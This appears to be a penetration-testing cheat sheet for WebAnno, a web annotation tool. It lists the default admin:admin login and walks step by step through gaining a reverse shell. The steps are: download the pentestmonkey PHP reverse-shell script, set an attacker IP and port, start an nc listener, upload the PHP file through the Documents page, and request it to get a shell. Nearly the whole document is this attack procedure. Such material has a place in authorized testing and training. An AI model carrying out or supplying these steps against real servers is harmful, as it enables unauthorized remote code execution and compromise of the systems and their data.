# WebAnno Pentesting

WebAnno is a web-based annotation tool for a wide range of linguistic annotations. The server uses the port 8080.

### Default Credentials <a href="#default-credentials" id="default-credentials"></a>

```
admin:admin
```

### Reverse Shell <a href="#reverse-shell" id="reverse-shell"></a>

If the target system opens the website assoated with WebAnno service, we can execute reverse shell by uploading the payload and access to the webpage hosts the payload.

#### 1. Go to the Upload Screen in Dashboard <a href="#id-1-go-to-the-upload-screen-in-dashboard" id="id-1-go-to-the-upload-screen-in-dashboard"></a>

1. Login
2. Click “Projects”.
3. Select the project in left pane.
4. Click Documents tab.

#### 2. Prepare Payload <a href="#id-2-prepare-payload" id="id-2-prepare-payload"></a>

WebAnno allows us to upload arbitrary file format, so we can upload PHP file for reverse shell.

```
wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php -O shell.php
vim shell.php

# Edit $ip and $port in editor.
```

Then start listener in local machine.

```
nc -lvnp 4444
```

#### 3. Upload the Payload <a href="#id-3-upload-the-payload" id="id-3-upload-the-payload"></a>

In WebAnno dashboard, upload the PHP file in the Documents page.

#### 4. Access to the Payload File in Another Server <a href="#id-4-access-to-the-payload-file-in-another-server" id="id-4-access-to-the-payload-file-in-another-server"></a>

For instance, access to <http://sub.example.com/path/to/shell.php>, we can get a shell in the local terminal.
